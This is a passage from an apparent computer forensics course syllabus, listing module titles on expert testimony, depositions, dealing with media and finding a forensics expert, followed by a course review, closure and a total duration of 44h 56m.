in a Testimony 1h Helping your Attorney Avoiding Testimony Issues Testifying during Direct Examination (Cont'd) Testifying during Direct Examination Testifying during Cross-Examination Deposing Recognizing Deposition Problems Guidelines to Testifying at a Deposition Dealing with Media Finding a Computer Forensics Expert Learn More… Module 22 Review Course Closure Total Duration: 44h 56m